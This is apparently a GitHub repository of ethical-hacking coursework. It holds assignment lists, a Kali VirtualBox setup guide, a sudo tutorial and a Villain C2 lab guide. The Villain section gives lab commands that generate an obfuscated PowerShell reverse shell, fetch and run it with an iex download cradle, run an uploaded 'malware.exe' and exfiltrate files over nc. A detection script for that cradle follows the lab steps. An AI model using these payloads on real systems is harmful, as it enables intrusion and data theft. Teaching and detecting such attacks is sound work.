├── EH-Syllabus.md:Zone.Identifier
├── LICENSE
├── .repo
    ├── README.md
    ├── Assignment_List_For_All.md
    ├── fork-users.csv
    ├── fork-users.md
    └── Assignment_Mapped_For_All.md
├── Difference-Between apt update & apt-get update.md
├── Villain.md
├── CyberRange Lab configuration.md
├── README.md
├── Sudo Usage Guide L1.md
├── Nmap Command Notes L1, L2 and L3.md
├── Basic Linux Commands for Begin.md
├── EH-Syllabus.md
└── .github
    └── workflows
        └── update-fork-users.yml


/EH-Syllabus.md:Zone.Identifier:
--------------------------------------------------------------------------------
[ZoneTransfer]
ZoneId=3

--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2025 sector21

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
--------------------------------------------------------------------------------
/.repo/README.md:
--------------------------------------------------------------------------------
# Fork Users Data

**Total Forks:** 105
**Report Generated:** 2025-12-16 01:47:27 IST

## Summary Statistics

| Status | Count | Percentage |
|--------|-------|------------|
| PASS | 88 | 83.8% |
| FAIL | 17 | 16.2% |
| **Total** | **105** | **100%** |

## Data Files
- **CSV Format**: `fork-users.csv` - Machine readable format
- **Markdown Format**: `fork-users.md` - Human readable table format with clickable links

## Data Structure
- **Profile Name**: User's display name or GitHub username
- **Username**: GitHub profile link (clickable in markdown format)
- **Repo Count**: Total number of public repositories
- **EthicalHackingNotes-Christ Check**: PASS if user has this specific repo, FAIL if not

## Sorting Order
Users are sorted chronologically by fork creation date:
- **First user to fork** appears at the top
- **Last user to fork** appears at the bottom

## Usage
- Use the **CSV file** for data analysis, spreadsheet imports, or automated processing
- Use the **Markdown file** for easy browsing with clickable GitHub profile links

## Repository Check
The `EthicalHackingNotes-Christ` column helps identify users who have created or forked the specific repository of interest.

--------------------------------------------------------------------------------
/Difference-Between apt update & apt-get update.md:
--------------------------------------------------------------------------------
# Difference Between `apt update` and `apt-get update`

When managing packages in a Debian-based Linux system like Ubuntu, you might come across two similar commands: `apt update` and `apt-get update`.
Let's explore the differences between these two commands, especially for beginners in cybersecurity.

## Overview
- **`apt`** and **`apt-get`** are tools used to interact with the package management system in Debian-based Linux distributions.
- **`apt update`** and **`apt-get update`** are used to update the package list, but they have some differences in terms of usability and intended audience.

### Key Differences

| Feature | `apt update` | `apt-get update` |
|---------|--------------|------------------|
| **User Experience** | More user-friendly and easy to use | Traditional, more complex, and detailed |
| **Output** | Provides progress bar and better formatting | Plain text output, without progress bar |
| **Recommended For** | General users and beginners | Advanced users and scripts |
| **Default Tool** | Introduced to replace `apt-get` for everyday use | Older tool for package management |
| **Commands Available** | Shorter and more intuitive | More commands, but more complex |

### Detailed Points

1. **Command Introduction**
   - **`apt`** is a newer command introduced as a more user-friendly tool to replace some of the commonly used functions of `apt-get`.
   - **`apt-get`** has been around for a long time and is more suitable for scripting and automation tasks.

2. **User Experience**
   - **`apt update`** has a cleaner output that includes a progress bar, making it easier to understand what's happening during the update process.
   - **`apt-get update`** provides a more raw output, which can be beneficial for debugging or advanced users who want to see detailed information.

3. **Which One Should You Use?**
   - For beginners in cybersecurity, it's recommended to use **`apt update`** as it is more intuitive and provides clearer feedback.
   - Advanced users, or those who need to automate processes, may still prefer **`apt-get update`** due to its more consistent behavior in scripts.

### Summary
- Both **`apt update`** and **`apt-get update`** update the package lists from the repositories, so the system knows about the latest versions of the software available.
- Use **`apt update`** for a simplified, user-friendly experience.
- Use **`apt-get update`** for scripting or when more control is needed.

> Remember: When managing packages, `apt` is more suited for beginners, while `apt-get` is for more advanced and automation use cases.

--------------------------------------------------------------------------------
/.repo/Assignment_List_For_All.md:
--------------------------------------------------------------------------------
# Ethical Hacking Assignments - Semester 5, 2025

## Assignment Instructions

* **Duration**: 2 hours maximum
* **Report**: 1-page report per assignment
* **Repository**: Create a GitHub repository named `EH_sem5_2025_Notes`
* **Directory**: Submit all assignments in the `1st Assignment` directory
* **Deadline**: Submit by next Friday

---

## Student Assignments

### Assignment 1: TCP and UDP Port Discovery

* Use `nmap` to scan both TCP and UDP ports on `scanme.nmap.org`.
* Save the results and summarize open services.
* **Report**: Explain TCP vs UDP ports + screenshot of the scan.

### Assignment 2: Full Port Scan

* Use `nmap -p-` to scan all 65535 ports on `testphp.vulnweb.com`.
* **Script**: Save the command as a `.sh` file and automate output saving.

### Assignment 3: DNS and IP Discovery

* Use `nmap -sL` and `dig` to find IPs, DNS info of `zero.webappsecurity.com`.
* Create a flowchart: DNS resolution process.

### Assignment 4: Create Low-Privilege User

* In Kali VM, create a user `student01` with no sudo access.
* Use `adduser`, `usermod`, and confirm permissions.
* **Evidence**: Screenshot of commands + `/etc/passwd` snippet.

### Assignment 5: File Creation and Permission

* Create a file using `touch`. Change permission to `751`.
* Use `chmod`, `ls -l`, and explain octal notation.

### Assignment 6: What is Shodan?

* Visit [Shodan.io](https://shodan.io), search for `scanme.nmap.org`.
* Document what data is visible and its use for attackers and defenders.

### Assignment 7: Explain Core Network Terms

* Create a 1-page illustrated document:

  * NAT, ARP, MAC, IPv4, IPv6
  * One-line explanation and diagram each.

### Assignment 8: Directory Monitoring Bash Script

* Write a 15-line bash script to monitor changes in `/home/student/Downloads`.
* Log the change type (file created/deleted/modified).

### Assignment 9: Mini Port Scanner Script

* Write a bash script that:

  * Takes IP as input
  * Scans top 1000 ports
  * Saves results in `scan_.log`

### Assignment 10: Linux AI Help Chat using Groq API

* Use Groq’s free API to create a CLI chatbot.
* Input: Any Linux command.
* Output: Easy explanation.
* **Limit**: ≤ 15 lines Python code.

### Assignment 11: Ncat Chat Terminal

* Create a script with 10 lines to simulate chat using `ncat`.
* Terminal A: Listener
* Terminal B: Connects and sends message

### Assignment 12: Serve a Directory using Python

* Use `python3 -m http.server 8080` in a directory.
* Screenshot server + browser result + terminal command.

### Assignment 13: VirusTotal API Usage

* Register for [VirusTotal](https://virustotal.com) API key.
* Use Python or bash with `curl` to check hash details of a test file.
* **Code limit**: 10-15 lines.

### Assignment 14: Sudo Usage Logging

* Create a Python/Bash script that monitors `/var/log/auth.log` every 30s.
* If `sudo` success/fail found, log username + time.

### Assignment 15: System Hack Timeline

* Pick any past real-life attack (e.g., Equifax breach).
* Document a 6-step timeline (initial access → data exfiltration).

### Assignment 16: Detect Service Version with Nmap

* Use `nmap -sV` on `testphp.vulnweb.com`.
* Summarize at least 3 detected services with versions and known CVEs.

### Assignment 17: Bash Script for Auto Ping and Log

* Create a script that:

  * Pings a domain every 5 mins
  * Logs response time in a CSV file with timestamp

### Assignment 18: Discover Hidden Directories

* Use `dirb` or `gobuster` on `testphp.vulnweb.com`.
* Document at least 5 discovered directories.

### Assignment 19: Python Socket Port Scanner

* Create a script that scans ports 1–100 on a given domain.
* Limit: 15 lines
* Add sleep between scans and proper output formatting.

### Assignment 20: Check Internet Exposure via Shodan

* Search your public IP on Shodan.
* Document what services are visible (mask IP in report).
* Reflect on what to do to harden your system.

---

## Submission Guidelines

1. **Repository Setup**: Create `EH_sem5_2025_Notes` repository
2. **Directory Structure**: Create `1st Assignment` folder
3. **Report Format**:

   * 1-page maximum
   * Include screenshots where applicable
   * Document your methodology
   * Explain findings and conclusions
4. **Code Submission**: Include all scripts and configurations
5. **Deadline**: Submit by next Friday

## Assessment Criteria

* **Technical Implementation** (40%)
* **Report Quality** (30%)
* **Security Analysis** (20%)
* **Documentation** (10%)

---

**Note**: All assignments are designed for educational purposes. Use only authorized systems and follow ethical hacking principles. Remember to respect privacy and legal boundaries in all activities.

--------------------------------------------------------------------------------
/Villain.md:
--------------------------------------------------------------------------------
# Simple Villain Framework Lab Guide

A step-by-step lab using **Kali Linux** (attacker) and **Windows 10** (victim) in VirtualBox, from payload gen to file transfers.

---

## 1. VirtualBox VM & Networking Setup

1. **Create VMs** in VirtualBox:

   * **Kali Linux**
   * **Windows 10**
2. **Set both adapters** to an **Internal Network** (or Host-Only) named `LabNet`.
3. **Assign static IPs** on the same `/24` subnet:

   * **Kali** (terminal):

     ```bash
     sudo ip addr add 192.168.56.10/24 dev eth0
     sudo ip link set eth0 up
     ```
   * **Windows 10** (Control Panel → Network Adapter → IPv4 settings):

     ```text
     IP address: 192.168.56.20
     Subnet mask: 255.255.255.0
     Gateway/DNS: (leave blank)
     ```
4. **Verify connectivity**:

   ```bash
   # On Kali
   ping 192.168.56.20
   ```

   You should see replies.

---

## 2. Prepare Kali Attacker

1. **Update & upgrade**:

   ```bash
   sudo apt update && sudo apt upgrade -y
   ```
2. **Clone Villain**:

   ```bash
   git clone https://github.com/keralahacker/Villain.git
   cd Villain
   ```

   > If GitHub is blocked (e.g. college Wi‑Fi), use a VPN or your phone’s hotspot.
3. **Install Python deps**:

   ```bash
   pip install -r requirements.txt
   ```
   ```bash
   sudo pip install -r requirements.txt --break-system-packages
   ```
   If it fails, skip to next step.
4. **Start Villain**:

   ```bash
   python3 Villain.py
   ```

   You’ll see the `villain>` prompt.

---

## 3. Build & Deliver Your Payload

### 3.1 Generate the reverse shell

```
villain> generate payload= lhost= [encode|obfuscate]
```

| Element       | Meaning                      | Example                   |
| ------------- | ---------------------------- | ------------------------- |
| `OS`          | Target OS family             | `windows`                 |
| `handler`     | Connection type              | `reverse_tcp` (stable)    |
| `template`    | Payload script               | `powershell`              |
| `lhost`       | Your Kali IP or interface    | `192.168.56.10` or `eth0` |
| `[encode]`    | Simple Base64-style encoding | optional (helps evade AV) |
| `[obfuscate]` | String-twisting for stealth  | optional                  |

**Example:**

```bash
villain> generate payload=windows/reverse_tcp/powershell lhost=192.168.56.10 encode
```

This writes `payload.ps1` for the Windows VM.

### 3.2 Host & run the payload

1. **On Kali**, serve it over HTTP:

   ```bash
   cp Core/payloads/windows/reverse_tcp/powershell.ps1 ~/payload.ps1
   cd ~
   python3 -m http.server 8000
   ```
2. **On Windows 10** (PowerShell as Admin):

   ```powershell
   iex (New-Object Net.WebClient).DownloadString('http://192.168.56.10:8000/payload.ps1')
   ```

   This runs the reverse shell back to Kali.

---

## 4. Catch & Use Your Shell

1. **List sessions**:

   ```bash
   villain> sessions
   ```
2. **Enter the shell**:

   ```bash
   villain> shell
   ```

   You get a `PS C:\>` prompt. Use `exit` or Ctrl+C to return.

---

## 5. Uploading Files to the Victim

```
villain> upload
```

* **Example:**

  ```bash
  villain> upload /home/kali/tools/malware.exe C:\Users\Public\malware.exe
  ```
* Then inside your shell:

  ```powershell
  PS C:\> & 'C:\Users\Public\malware.exe'
  ```

---

## 6. Downloading Files from the Victim

Villain has no built-in “download,” but you can exfiltrate:

1. **On Kali**, listen:

   ```bash
   nc -lvp 9001 > secret.txt
   ```
2. **In Windows shell:**

   ```powershell
   PS C:\> nc 192.168.56.10 9001 < C:\Users\Public\secret.txt
   ```

Alternatively, spin up an HTTP server on Windows:

```powershell
PS C:\Users\Public> python3 -m http.server 8000
```

Then on Kali:

```bash
wget http://192.168.56.20:8000/secret.txt -O secret.txt
```

---

## 7. Cleaning Up & Tips

* **flee**: Exit without killing sessions:

  ```bash
  villain> flee
  ```
* **purge**: Wipe saved implant metadata:

  ```bash
  villain> purge
  ```

**Pro Tips:**

* Verify your **lhost** and subnet before generating.
* Use `backdoors` to list re-usable payloads.
* Keep Kali’s firewall off on the lab network.

---

## 8. Broadcast Messages with `#`

You can send a chat message to all connected sibling servers by prefixing with `#`:

```bash
villain> # Hey team, switch to backup C2 channel
```

---

That’s the full lab: network setup, payload gen, shell, file IO, and messaging. Enjoy your ethical testing!
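
Seen from the defender's side, the delivery step in section 3.2 leaves a recognisable trace when PowerShell Script Block Logging (event ID 4104) is enabled on the Windows VM. The sketch below is an added example, not part of the original guide: it scans constructed log records for that download-and-execute pattern, and the record shape, `SAMPLE_EVENTS` and all function names are assumptions made for illustration.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed sample records (host, script block text) in the shape of exported
# PowerShell Script Block Logging events (event ID 4104). Not real telemetry.
SAMPLE_EVENTS = [
    ("WIN10-LAB", "iex (New-Object Net.WebClient).DownloadString("
                  "'http://192.168.56.10:8000/payload.ps1')"),
    ("WIN10-LAB", r"Get-ChildItem C:\Users\Public"),
    ("WIN10-LAB", 'Invoke-Expression ((New-Object System.Net.WebClient)'
                  '.DownloadString("http://192.168.56.10:8000/payload.ps1"))'),
    ("WIN10-LAB", r"(New-Object Net.WebClient).DownloadFile("
                  r"'https://example.com/tool.zip', 'C:\Temp\tool.zip')"),
]

# iex / Invoke-Expression as a standalone token (not part of a longer name).
EXEC_RE = re.compile(r"(?<![\w-])(?:iex|invoke-expression)(?![\w-])", re.I)
WEBCLIENT_RE = re.compile(r"(?:System\.)?Net\.WebClient", re.I)
DOWNLOAD_RE = re.compile(r"\.Download(String|Data|File)\s*\(", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)


def describe_url(url):
    """Break a URL into the attributes an analyst triages on."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    try:
        ipaddress.ip_address(host)
        ip_literal = True
    except ValueError:
        ip_literal = False
    default_port = 443 if parts.scheme == "https" else 80
    try:
        port = parts.port or default_port
    except ValueError:  # malformed port in the logged text
        port = default_port
    return {
        "url": url,
        "host": host,
        "port": port,
        "cleartext": parts.scheme == "http",
        "ip_literal": ip_literal,
        "odd_port": port != default_port,
    }


def classify(script_text):
    """Return a finding for a WebClient download, or None if there is none."""
    method = DOWNLOAD_RE.search(script_text)
    if not (method and WEBCLIENT_RE.search(script_text)):
        return None
    # DownloadString/DownloadData keep the content in memory; DownloadFile writes it out.
    in_memory = method.group(1).lower() in ("string", "data")
    executed = bool(EXEC_RE.search(script_text))
    urls = [describe_url(u) for u in URL_RE.findall(script_text)]

    reasons = ["WebClient.Download%s call" % method.group(1)]
    if executed and in_memory:
        reasons.append("downloaded text passed to Invoke-Expression")
    for u in urls:
        if u["ip_literal"]:
            reasons.append("URL uses a bare IP address: " + u["host"])
        if u["cleartext"]:
            reasons.append("cleartext HTTP")
        if u["odd_port"]:
            reasons.append("non-default port %d" % u["port"])
    return {
        "severity": "high" if executed and in_memory else "medium",
        "urls": urls,
        "reasons": reasons,
    }


def scan(events):
    """Classify every (host, script text) record and keep the hits."""
    findings = []
    for host, text in events:
        finding = classify(text)
        if finding:
            findings.append({"host": host, **finding})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f["severity"].upper(), f["host"], "; ".join(f["reasons"]))
```
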

--------------------------------------------------------------------------------
/CyberRange Lab configuration.md:
--------------------------------------------------------------------------------
# Getting Started with Kali Linux on Windows using VirtualBox

This guide will walk you through downloading, installing, extracting, and running **Kali Linux** in a **Windows 10/11** environment using **Oracle VirtualBox**. It has been structured specifically for cybersecurity and ethical hacking learners who want to create a secure, isolated lab setup.

---

## ☑ Prerequisites: Setup Virtualization Environment

### 1. Install VirtualBox

* Visit [https://www.virtualbox.org/wiki/Downloads](https://www.virtualbox.org/wiki/Downloads)
* Choose **Windows hosts** if your system runs Windows 10 or 11
* Download the installer and run it

  * Locate the file in `Downloads`
  * Right-click and **Run as Administrator**
  * Follow the installer wizard: Click **Next**, **Install**, and **Finish**
* A **reboot is recommended** after installation

### 2. Enable Windows Virtualization Features

* Open **Start Menu** → search for `Turn Windows features on or off`
* Enable the following checkboxes:

  * `Hyper-V`
  * `Virtual Machine Platform`
  * `Windows Hypervisor Platform`
  * `Windows Subsystem for Linux`
* Click **OK** and **Reboot** your system

---

## ☑ Install 7-Zip (for extracting .7z files)

### 1. Download 7-Zip

* Visit [https://www.7-zip.org/](https://www.7-zip.org/)
* Download the appropriate version for your system (64-bit recommended)

### 2. Install 7-Zip

* Locate the downloaded installer
* Right-click → **Run as Administrator**
* Click **Next**, **Install**, and **Finish**

---

## ☑ Download & Extract Kali Linux for VirtualBox

### 1. Download Kali Linux VM

* Go to [https://www.kali.org/get-kali/#kali-virtual-machines](https://www.kali.org/get-kali/#kali-virtual-machines)
* Choose the **VirtualBox Image** under "Kali Linux Virtual Machines"

  * Prefer the **standard release**, not the weekly build (avoid dev/debugging versions)

### 2. Extract the .7z File

* Locate the file: `kali-linux-2025.2-virtualbox-amd64.7z`
* Right-click → 7-Zip → **Extract Here**
* Wait for 2–5 minutes
* You will get a folder named: `kali-linux-2025.2-virtualbox-amd64`

This folder contains the **Kali VM image** and configuration for VirtualBox.

---

## ☑ Open Kali Linux in VirtualBox

### 1. Locate & Open VM

* Open the extracted folder
* Locate a file named `kali-linux-2025.2-virtualbox-amd64.vbox`
* Double-click this `.vbox` file

  * This action will auto-import the VM into **VirtualBox**

### 2. Verify VM is Loaded

* VirtualBox will display the Kali VM in the sidebar

---

## ☑ Configure Kali Linux VM (Safe + Optimized)

### Edit VM Settings:

* Right-click on the Kali VM → **Settings**

**System Settings:**

* Base Memory: **2048 MB** (2 GB RAM)
* Processor(s): **2 CPUs**

**Network:**

* Adapter 1: **NAT** (for internet access)

**Shared Folders (Optional):**

* Add shared folders between host and guest for easy file transfer

---

## ☑ Start Kali Linux

### 1. Power On the VM

* Click **Start** or double-click the VM name

### 2. Login Credentials

* Username: `kali`
* Password: `kali`

---

## ☑ First Things to Do After Boot

### 1. Update and Upgrade System

```bash
sudo apt update && sudo apt upgrade -y
```

### 2. Reboot System

```bash
sudo reboot
```

### 3. (Optional) Change Password

```bash
sudo passwd
# Enter new password twice
```

### 4. Install a Better Terminal

The default terminal may be slow or unresponsive. Install **Terminator**:

```bash
sudo apt install -y terminator
```

---

## ☑ Summary Checklist

| Step                         | Status |
| ---------------------------- | ------ |
| VirtualBox Installed         | ☑      |
| Hypervisor Enabled           | ☑      |
| 7-Zip Installed              | ☑      |
| Kali VM Downloaded           | ☑      |
| Kali VM Extracted            | ☑      |
| Kali VM Opened in VirtualBox | ☑      |
| VM Configured (RAM/CPU/NAT)  | ☑      |
| Kali Updated & Ready         | ☑      |

---

## 📚 Additional Recommendations

* Always **update Kali** before starting new labs
* **Snapshot** the VM state after initial setup (optional but recommended)
* Keep a backup of the `.vbox` and `.vdi` files
* Avoid using Kali Linux VM for general browsing
* Use it strictly as a **sandbox** for ethical hacking practices

---

## 💼 Intended Audience

This document is tailored for **Cybersecurity & Ethical Hacking** students aiming to:

* Practice hands-on penetration testing
* Learn security tools in a virtual lab
* Build real-world ethical hacking experience

---

For any issues or improvements, raise a ticket or contact your course instructor.

---

**Author**: Vaishnavu C V
**Role**: Principal CyberSecurity Engineer, Mentor & Ethical Hacker
**Code Name**: `@hackwithvyshu`

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Ethical Hacking Assignments - Semester 3, 2025

## 📋 Quick Index
**Last Updated:** 29/07/2025
**Version:** 1.0
**Total Students:** 103
**Total Assignments:** 20

### 🎯 Assignment Overview
- **Total Assignments:** 20 unique assignments
- **Total Students:** 103 students
- **Duration:** 2 hours maximum per assignment
- **Report:** 2-3 page report per assignment
- **Deadline:** Submit before next Friday

---

## 📚 Assignment Index

### 🔍 Network Reconnaissance
1. **TCP and UDP Port Discovery** - Scan `scanme.nmap.org` for open ports
2. **Full Port Scan** - Scan all 65,535 ports on `testphp.vulnweb.com`
3. **DNS and IP Discovery** - Find IPs and DNS info of `zero.webappsecurity.com`
4. **Detect Service Version with Nmap** - Version detection on `testphp.vulnweb.com`
5. **Check Internet Exposure via Shodan** - Personal security audit

### 🛡️ System Security
6. **Create Low-Privilege User** - Create `student01` user without sudo access
7. **File Creation and Permission** - Set file permissions to 751
8. **Sudo Usage Logging** - Monitor `/var/log/auth.log` for sudo attempts

### 🕵️ Information Gathering
9. **What is Shodan?** - Explore Shodan.io for `scanme.nmap.org`
10. **Explain Core Network Terms** - Create guide for NAT, ARP, MAC, IPv4, IPv6
11. **System Hack Timeline** - Research real cyber attacks (6-step timeline)
12. **Discover Hidden Directories** - Use `dirb`/`gobuster` on `testphp.vulnweb.com`

### 💻 Scripting & Automation
13. **Directory Monitoring Bash Script** - 15-line script to monitor `/home/student/Downloads`
14. **Mini Port Scanner Script** - Bash script for top 1000 ports
15. **Bash Script for Auto Ping and Log** - Ping domain every 5 mins, log to CSV
16. **Python Socket Port Scanner** - 15-line Python script for ports 1-100

### 🤖 AI & Modern Tools
17. **Linux AI Help Chat using Groq API** - 15-line Python chatbot for Linux commands
18. **VirusTotal API Usage** - 10-15 lines to check file hash with VirusTotal

### 🌐 Network Communication
19. **Ncat Chat Terminal** - 10-line script for chat using `ncat`
20. **Serve a Directory using Python** - Use `python3 -m http.server 8080`

---

## 👥 Student Distribution

### 📊 Distribution Summary
- **Round 1:** Students 1-20 (20 students)
- **Round 2:** Students 21-40 (20 students)
- **Round 3:** Students 41-60 (20 students)
- **Round 4:** Students 61-80 (20 students)
- **Round 5:** Students 81-103 (23 students)

### 🎲 Assignment Rotation
Each assignment is given to multiple students across different rounds:
- **Assignment 1:** 5 students (one per round)
- **Assignment 2:** 5 students (one per round)
- **Assignment 3:** 5 students (one per round)
- ... and so on for all 20 assignments

---

## 📝 Submission Requirements

### 📁 Repository Setup
1. Create GitHub repository: `EH_sem3_2025_Notes`
2. Create directory: `1st Assignment`
3. Submit all work in this directory

### 📄 Report Format (1-page maximum)
- **Methodology:** How you approached the task
- **Screenshots:** Where applicable
- **Findings:** What you discovered
- **Conclusions:** What you learned
- **Code:** Include all scripts and configurations

### ⏰ Assessment Criteria
- **Technical Implementation** (40%)
- **Report Quality** (30%)
- **Security Analysis** (20%)
- **Documentation** (10%)

---

## 🛠️ Tools & Technologies

### 🔧 Primary Tools
- **Nmap** - Network scanning and discovery
- **Bash Scripting** - Automation and monitoring
- **Python** - API integration and custom tools
- **Linux Commands** - System administration
- **Shodan** - Internet reconnaissance
- **VirusTotal** - Malware analysis

### 🌐 Target Systems
- `scanme.nmap.org` - Nmap's test server
- `testphp.vulnweb.com` - Vulnerable web application
- `zero.webappsecurity.com` - Security testing site

---

## ⚠️ Important Notes

### 🎓 Educational Purpose
- All assignments are for **educational purposes only**
- Use only **authorized systems** and targets
- Follow **ethical hacking principles**
- Respect **privacy and legal boundaries**

### 🔒 Security Guidelines
- Only test systems you own or have permission to test
- Do not attempt to access unauthorized systems
- Report any discovered vulnerabilities responsibly
- Maintain confidentiality of sensitive information

---

## 📞 Support & Resources

### 📚 Learning Resources
- [Nmap Documentation](https://nmap.org/docs.html)
- [Shodan Search Engine](https://shodan.io)
- [VirusTotal API](https://developers.virustotal.com)
- [Linux Command Reference](https://linux.die.net/man/)

### 🆘 Getting Help
- Check assignment details in [Assignment_Mapped_For_All.md](https://github.com/sector21/EthicalHackingNotes/blob/main/.repo/Assignment_Mapped_For_All.md)
- Review the detailed explanations and scenarios
- Follow the step-by-step instructions provided
- Contact instructor for clarification

---

## 📈 Progress Tracking

### ✅ Assignment Completion Checklist
- [ ] Repository created with correct name
- [ ] Assignment directory structure set up
- [ ] Technical implementation completed
- [ ] Screenshots and evidence collected
- [ ] 1-page report written
- [ ] Code and scripts included
- [ ] Submission ready by deadline

---

--------------------------------------------------------------------------------
/.repo/fork-users.csv:
--------------------------------------------------------------------------------
Profile Name,Username,Repo Count,EthicalHackingNotes-Christ Check
"Stacydsouza","https://github.com/Stacydsouza",3,"PASS" 82 | "jfs1336","https://github.com/jfs1336",8,"FAIL" 83 | "Tom-boby","https://github.com/Tom-boby",7,"PASS" 84 | "TenzinRigzin2460462","https://github.com/TenzinRigzin2460462",8,"PASS" 85 | "AntonyPraveenReddyK","https://github.com/AntonyPraveenReddyK",12,"FAIL" 86 | "aadithyavimal-christ","https://github.com/aadithyavimal-christ",4,"PASS" 87 | "jonac77","https://github.com/jonac77",7,"PASS" 88 | "diyasusan-coder","https://github.com/diyasusan-coder",7,"PASS" 89 | "Fariha006","https://github.com/Fariha006",7,"PASS" 90 | "LeoRineeth","https://github.com/LeoRineeth",9,"FAIL" 91 | "ArthurFigrous","https://github.com/ArthurFigrous",6,"FAIL" 92 | "SonalJoy10","https://github.com/SonalJoy10",9,"PASS" 93 | "RAAPPO","https://github.com/RAAPPO",8,"PASS" 94 | "bigdaddy110","https://github.com/bigdaddy110",3,"FAIL" 95 | "BarathCG","https://github.com/BarathCG",4,"PASS" 96 | "AmanVarunEkka","https://github.com/AmanVarunEkka",3,"PASS" 97 | "GOKUL06092006","https://github.com/GOKUL06092006",6,"PASS" 98 | "Abishek-gitit","https://github.com/Abishek-gitit",10,"PASS" 99 | "Ridhi105","https://github.com/Ridhi105",3,"PASS" 100 | "MINEAMICHEAL","https://github.com/MINEAMICHEAL",5,"PASS" 101 | "Prajin-30","https://github.com/Prajin-30",4,"PASS" 102 | "Tenzin-Choeying1","https://github.com/Tenzin-Choeying1",6,"FAIL" 103 | "elizamiriampaul","https://github.com/elizamiriampaul",3,"PASS" 104 | "lijo6666","https://github.com/lijo6666",3,"PASS" 105 | "moonknight96","https://github.com/moonknight96",2,"FAIL" 106 | "Istiaq-Alam","https://github.com/Istiaq-Alam",52,"FAIL" -------------------------------------------------------------------------------- /Sudo Usage Guide L1.md: -------------------------------------------------------------------------------- 1 | # Sudo Command Guide for Beginners (L1 Level) 2 | 3 | This document provides a complete beginner-friendly guide to understanding and using the `sudo` command in Linux-based systems. 
It is tailored for Level 1 (L1) learners and junior cybersecurity/system administration professionals.

---

## What is `sudo`?

`sudo` stands for "superuser do". It allows a permitted user to execute a command as the superuser or another user, as specified by the security policy (usually `/etc/sudoers`).

**Use Case:** It is used to perform administrative tasks without switching to the root account.

---

## Why is `sudo` Important?

* Maintains system security by limiting root access
* Tracks which user ran privileged commands (audit-friendly)
* Prevents mistakes by enforcing controlled access to powerful commands
* Encourages the principle of least privilege

---

## Syntax of `sudo`

```bash
sudo [option] [command]
```

**Example:**

```bash
sudo apt update
```

This updates the package list using elevated permissions.

---

## Common `sudo` Command Examples

| Task             | Command                          | Scenario                         |
| ---------------- | -------------------------------- | -------------------------------- |
| Update packages  | `sudo apt update`                | Keeping system packages updated  |
| Install software | `sudo apt install nmap`          | Installing a new tool like Nmap  |
| Edit system file | `sudo nano /etc/hosts`           | Modify system-level config files |
| Reboot system    | `sudo reboot`                    | Restarting system remotely       |
| Change ownership | `sudo chown user:group file.txt` | Grant ownership of a file        |
| Add a user       | `sudo useradd devuser`           | Add new user to system           |

---

## Workflow of `sudo`

1. **User types command with `sudo`**
2. **System checks `/etc/sudoers` for permission**
3. **If permitted, the system prompts for the user’s password**
4. **If password is correct and permission granted, command runs as root**
5. **Audit logs are updated with execution details**

---

## Configure `sudo` Access

### Step 1: Add user to `sudo` group (Debian/Ubuntu)

```bash
sudo usermod -aG sudo username
```

### Step 2: Verify

```bash
sudo -l
```

Run as the new user (after logging in again, so the group change applies), this lists the commands that user is allowed to run with `sudo`.

---

## Creating Users: With and Without `sudo`

### Scenario A: Create a regular user **with** `sudo`

```bash
sudo adduser devadmin
sudo usermod -aG sudo devadmin
```

This user can now use `sudo`.

### Scenario B: Create a regular user **without** `sudo`

```bash
sudo adduser internuser
```

This user cannot run administrative commands unless explicitly added to the `sudo` group.

---

## Best Practices

* Use `sudo` only when necessary
* Avoid running full shells as root: `sudo -i` or `sudo su`
* Monitor `/var/log/auth.log` for sudo activities
* Configure minimal privilege using `visudo`

---

## Enabling `sudo` Usage Tracking and Monitoring

Monitoring `sudo` usage is critical for auditing and maintaining security. Here’s how to enable and track sudo activities in a simple way:

### 1. View Sudo Logs

```bash
sudo cat /var/log/auth.log | grep sudo
```

**Purpose**: Displays all sudo activity, including who used it and what command was run.

### 2. Tail Sudo Logs in Real Time

```bash
sudo tail -f /var/log/auth.log | grep sudo
```

**Purpose**: Continuously monitor sudo usage as it happens.

### 3. Add a Sudo Log Alias (Optional for L1)

Edit `.bashrc` to add:

```bash
alias sudolog='grep sudo /var/log/auth.log'
```

Then reload:

```bash
source ~/.bashrc
```

**Purpose**: Simplifies checking sudo logs with the `sudolog` command.

### 4. Audit With `ausearch` (If auditd is enabled)

```bash
sudo ausearch -m USER_CMD -x sudo
```

**Purpose**: Queries auditd logs for all sudo commands.

> Note: `auditd` may need to be installed and started for this to work:

```bash
sudo apt install auditd
sudo systemctl enable auditd && sudo systemctl start auditd
```

---

## `sudo` vs `su`

| Feature                     | `sudo` | `su`                   |
| --------------------------- | ------ | ---------------------- |
| Runs single command as root | ✅      | ❌                      |
| Requires user’s password    | ✅      | ❌ (asks root password) |
| Audit logging               | ✅      | ❌                      |
| Temporary root shell        | ❌      | ✅                      |

---

## Grant Limited `sudo` Access (Example)

To allow a user to run only the reboot command:

```bash
sudo visudo
```

Add this line:

```bash
username ALL=(ALL) NOPASSWD: /sbin/reboot
```

`NOPASSWD:` means this one command runs without a password prompt; `visudo` checks the file's syntax before saving it.

---

## Troubleshooting `sudo`

| Issue                             | Cause                     | Resolution                        |
| --------------------------------- | ------------------------- | --------------------------------- |
| `user is not in the sudoers file` | Not part of `sudo` group  | Use root to add user to group     |
| `command not found`               | Misspelled or uninstalled | Double-check spelling and path    |
